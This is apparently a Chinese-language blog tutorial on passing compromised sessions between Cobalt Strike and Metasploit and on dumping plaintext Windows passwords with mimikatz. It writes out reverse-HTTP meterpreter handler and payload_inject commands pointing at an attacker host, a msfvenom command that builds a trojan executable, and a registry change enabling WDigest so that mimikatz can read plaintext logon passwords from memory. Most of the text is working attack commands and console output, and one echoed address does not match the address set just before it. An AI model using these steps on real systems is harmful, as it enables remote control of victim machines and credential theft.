CS配合MSF互傳許可權 以及使用mimikatz抓取明文密碼

f0r9發表於2024-05-29

cobalt strike 與 metasploit 互傳許可權

1.cobalt傳遞許可權給msf

啟動server端
./teamserver [監聽地址] [密碼]
使用客戶端連線:
image
生成一個監聽器

image
在5555埠 服務端上監聽

image
生成後門 可以選擇以上幾種

image
選擇interact 模組進行利用

image
先生成一個外部http監聽器
這裡填寫msf主機所監聽的埠和IP

msf6 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.80.128
lhost => 192.168.80.128
msf6 exploit(multi/handler) > set lport 6666
lport => 6666
set payload windows/meterpreter/reverse_http
payload => windows/meterpreter/reverse_http
run

使用msf監聽對應主機與埠

image
進行許可權傳遞 使用spawn模組
選擇
image
成功將許可權傳遞給msf
image
總結一下 cs客戶端生成木馬 伺服器監聽對應地址與埠 等待目標主機上線 上線後 在msf主機上監聽對應埠與IP 然後cs生成一個外部監聽器 將會話派生一個給msf

2.msf傳遞許可權給cobalt

使用msf生成木馬:

msfvenom -p windows/meterpreter/reverse_http lhost=192.168.80.128 lport=8888 -f exe >> msf_shell.exe

這是一個反向連結的http木馬 透過監聽本地 8888埠來反鏈目標主機 傳遞資料
然後開啟msf控制檯監聽埠與地址
image
使用windows/local/payloads_inject模組將許可權傳遞給cs

meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > use exploit/windows/local/payload_inject 
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/payload_inject) > set payload windows/meterpreter/reverse_http
payload => windows/meterpreter/reverse_http
msf6 exploit(windows/local/payload_inject) > set lhost 192.168.80.133
lhost => 192.168.80.1
msf6 exploit(windows/local/payload_inject) > set lport 8855
lport => 8855
msf6 exploit(windows/local/payload_inject) > set session 1
session => 1

用cobalt生成一個監聽器 監聽服務端 埠和ip與msf一致
image
成功互傳許可權

mimikatz抓取明文密碼

windows 在傳遞密碼時一般使用hash 但在第一次傳遞密碼時 需要一個程式將目標處理變成hash
這時就可以在該程序(lsass)中抓取明文密碼
存在前置條件:登錄檔中UseLogonCredential項必須為1
這個是該項的具體位置HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders\WDigest
可以使用shell對該值進行修改

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

image

並且密碼只能在使用者登入時才能抓取

mimikatz.exe privilege::debug

抓取明文密碼
image
成功

相關文章